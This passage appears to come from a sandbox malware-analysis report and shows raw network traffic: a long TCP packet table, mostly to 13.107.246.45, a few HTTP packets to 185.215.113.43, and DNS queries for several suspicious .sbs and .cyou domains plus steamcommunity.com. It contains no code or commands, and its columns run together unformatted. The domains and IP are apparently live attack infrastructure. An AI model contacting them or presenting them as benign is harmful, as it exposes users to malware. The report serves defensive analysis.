                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.567405939 CET49812443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.567425966 CET4434981213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.567445993 CET49812443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.567451000 CET4434981213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.570597887 CET49819443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.570632935 CET4434981913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.570715904 CET49819443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.570869923 CET49819443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.570883989 CET4434981913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.647192001 CET4434981513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.647980928 CET49815443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.647989988 CET4434981513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.648565054 CET4434981613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.649137020 CET4434981713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.649360895 CET49815443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.649364948 CET4434981513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.649434090 CET49816443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.649449110 CET4434981613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.649880886 CET49816443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.649885893 CET4434981613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.650068045 CET49817443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.650082111 CET4434981713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.650415897 CET49817443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.650418997 CET4434981713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.650563002 CET4434981813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.650969028 CET49818443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.650978088 CET4434981813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.652136087 CET49818443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.652143002 CET4434981813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.740487099 CET4434981513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.740535021 CET4434981513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.740622044 CET49815443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.740932941 CET49815443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.740941048 CET4434981513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.740963936 CET49815443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.740967989 CET4434981513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.744256973 CET4434981613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.744288921 CET49820443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.744294882 CET4434981613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.744309902 CET4434982013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.744375944 CET49816443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.744411945 CET49820443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.744559050 CET49820443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.744569063 CET4434982013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.744596958 CET49816443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.744611025 CET4434981613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.744630098 CET49816443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.744636059 CET4434981613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.744720936 CET4434981713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.744808912 CET4434981713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.745203972 CET49817443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.745229006 CET49817443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.745238066 CET4434981713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.745248079 CET49817443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.745251894 CET4434981713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.746849060 CET4434981813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.747046947 CET4434981813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.747116089 CET49818443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.747333050 CET49818443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.747339010 CET4434981813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.747348070 CET49818443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.747350931 CET4434981813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.747740984 CET49821443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.747764111 CET4434982113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.747827053 CET49821443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.747915030 CET49822443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.747922897 CET4434982213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.748043060 CET49821443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.748053074 CET4434982113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.748090982 CET49822443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.748166084 CET49822443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.748173952 CET4434982213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.749885082 CET49823443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.749896049 CET4434982313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.749963045 CET49823443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.750122070 CET49823443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.750129938 CET4434982313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.113796949 CET4434981913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.114717960 CET49819443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.114736080 CET4434981913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.116121054 CET49819443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.116125107 CET4434981913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.207462072 CET4434981913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.207525969 CET4434981913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.207869053 CET49819443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.207911015 CET49819443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.207918882 CET4434981913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.207927942 CET49819443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.207932949 CET4434981913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.212019920 CET49824443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.212048054 CET4434982413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.212121010 CET49824443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.212302923 CET49824443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.212317944 CET4434982413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.280555010 CET4434982113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.281260967 CET4434982013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.281420946 CET49821443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.281434059 CET4434982113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.281457901 CET4434982313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.281794071 CET49820443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.281806946 CET4434982013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.282100916 CET49823443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.282109976 CET4434982313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.282537937 CET49823443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.282542944 CET4434982313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.282834053 CET49820443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.282838106 CET4434982013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.282928944 CET49821443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.282932997 CET4434982113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.312623978 CET4434982213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.313038111 CET49822443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.313045025 CET4434982213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.313560009 CET49822443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.313563108 CET4434982213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.373681068 CET4434982113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.373754025 CET4434982313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.373858929 CET4434982313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.373929977 CET49823443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.374082088 CET4434982113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.374105930 CET49823443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.374119043 CET4434982313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.374130964 CET49823443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.374130964 CET49821443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.374138117 CET4434982313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.374207020 CET49821443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.374209881 CET4434982113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.374224901 CET49821443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.374227047 CET4434982113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.374279976 CET4434982013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.374325991 CET4434982013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.375165939 CET49820443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.376131058 CET49820443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.376141071 CET4434982013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.376154900 CET49820443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.376159906 CET4434982013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.378386021 CET49825443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.378417969 CET4434982513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.378505945 CET49825443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.378638983 CET49825443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.378649950 CET4434982513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.379354000 CET49826443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.379395962 CET4434982613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.379453897 CET49827443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.379463911 CET4434982713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.379493952 CET49826443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.379518986 CET49827443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.379560947 CET49826443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.379574060 CET4434982613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.379733086 CET49827443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.379741907 CET4434982713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.405308008 CET4434982213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.405436039 CET4434982213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.405539036 CET49822443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.405787945 CET49822443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.405792952 CET4434982213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.408744097 CET49828443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.408787966 CET4434982813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.408859015 CET49828443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.408993959 CET49828443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.409009933 CET4434982813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.727806091 CET4434982413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.728281975 CET49824443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.728296995 CET4434982413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.728909016 CET49824443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.728914976 CET4434982413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.766832113 CET4982980192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.773541927 CET8049829185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.773659945 CET4982980192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.778376102 CET4982980192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.783288002 CET8049829185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.849561930 CET4434982413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.849639893 CET4434982413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.849795103 CET49824443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.849967957 CET49824443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.849987984 CET4434982413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.850001097 CET49824443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.850007057 CET4434982413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.853388071 CET49830443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.853430033 CET4434983013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.853509903 CET49830443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.853698969 CET49830443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.853712082 CET4434983013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.890575886 CET4434982513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.891153097 CET49825443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.891170025 CET4434982513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.891748905 CET49825443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.891755104 CET4434982513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.896692038 CET4434982613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.896975040 CET49826443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.897003889 CET4434982613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.897053957 CET4434982713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.897301912 CET49827443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.897309065 CET4434982713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.897320986 CET49826443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.897330999 CET4434982613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.897819996 CET49827443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.897825003 CET4434982713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.942956924 CET4434982813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.943497896 CET49828443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.943516016 CET4434982813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.944005013 CET49828443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.944011927 CET4434982813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.983949900 CET4434982513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.984186888 CET4434982513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.984353065 CET49825443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.984416962 CET49825443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.984432936 CET4434982513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.984441996 CET49825443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.984447002 CET4434982513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.988447905 CET49831443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.988481998 CET4434983113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.988583088 CET49831443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.988780022 CET49831443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.988791943 CET4434983113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.989921093 CET4434982713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.990108013 CET4434982613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.990125895 CET4434982713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.990184069 CET49827443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.990209103 CET49827443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.990212917 CET4434982713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.990226030 CET49827443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.990228891 CET4434982713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.990246058 CET4434982613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.990288973 CET49826443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.990333080 CET49826443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.990351915 CET4434982613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.990364075 CET49826443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.990369081 CET4434982613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.992508888 CET49832443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.992532015 CET4434983213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.992602110 CET49832443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.992670059 CET49833443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.992691040 CET4434983313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.992733955 CET49832443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:05.992743969 CET4434983213.107.246.45192.168.2.4

                                                                                                                                                                                                                                                                                        DNS Queries

                                                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:06.555712938 CET192.168.2.41.1.1.10x568eStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:06.556020975 CET192.168.2.41.1.1.10x57f1Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:08.920144081 CET192.168.2.41.1.1.10xe0abStandard query (0)apis.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:08.920310974 CET192.168.2.41.1.1.10xa3dfStandard query (0)apis.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:09.915771008 CET192.168.2.41.1.1.10xa225Standard query (0)play.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:09.915926933 CET192.168.2.41.1.1.10x3053Standard query (0)play.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:20.473422050 CET192.168.2.41.1.1.10x663aStandard query (0)terracedjz.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:20.505523920 CET192.168.2.41.1.1.10x6826Standard query (0)repostebhu.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:20.532320023 CET192.168.2.41.1.1.10x3662Standard query (0)thinkyyokej.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:20.559997082 CET192.168.2.41.1.1.10xf7e5Standard query (0)ducksringjk.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:20.601552963 CET192.168.2.41.1.1.10xba8aStandard query (0)explainvees.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:20.632695913 CET192.168.2.41.1.1.10xccb6Standard query (0)brownieyuz.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:20.657391071 CET192.168.2.41.1.1.10xc221Standard query (0)rottieud.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:20.707699060 CET192.168.2.41.1.1.10xe5efStandard query (0)relalingj.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:20.772344112 CET192.168.2.41.1.1.10x537Standard query (0)tamedgeesy.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:20.831789017 CET192.168.2.41.1.1.10x6027Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
